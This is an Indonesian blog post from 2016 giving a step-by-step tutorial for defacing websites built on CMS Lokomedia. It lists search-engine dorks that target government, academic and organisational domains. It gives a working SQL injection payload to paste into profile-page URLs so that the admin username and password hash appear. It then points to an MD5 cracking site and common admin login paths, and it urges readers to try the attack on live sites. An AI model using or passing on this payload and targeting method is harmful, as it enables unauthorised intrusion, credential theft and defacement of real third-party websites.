Thursday, September 15, 2016
Masih Bersama saya si Youez yg tersakiti :lol, Oke kali ini saya akan memberikan tutorial deface CMS Lokomedia 2016
Oke Langsung saja gaess .. :D
Dork : inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
(kembangin lgi cokk)
Note : tambahkan site:org / site:net / site:go.id / site:ac.id / site:id
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Langsung sja gunakan dork diatas menggunakan search engine (google.com) .
Klau sudah dapat Targetnya contoh kyak gini nih .....
www.site.go.id/statis-1-profil.html
Langsung saja masukkan exploit diatas
www.site.go.id/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
Nanti username dan password adminnya keliatan tuh di title webnya .
kyak gini .
Kan disitu tdk keliatan jelas passnya klau mau liat fullnya tambahkan "view-source:" Contoh kek gini.
Tuh kan Udah keliata user dan pass adminnya^_^
Tapi passwordnya msih berbentuk md5 -_- terpaksa hrus di hash dulu mas mbah ^_^
Link hash md5 : https://hashkiller.co.uk/md5-decrypter.aspx
Sisa cari saja sendiri halaman loginnya , contoh :
www.site.go.id/adminweb | www.site.go.id/administrator | www.site.go.id/admin | www.site.go.id/redaktur
Ok gitu aja basa basinya mas :D
Langsung aja di praktekin ya . Jangan lupa tetap stay di blog ini :*
Wassalamualaikum ....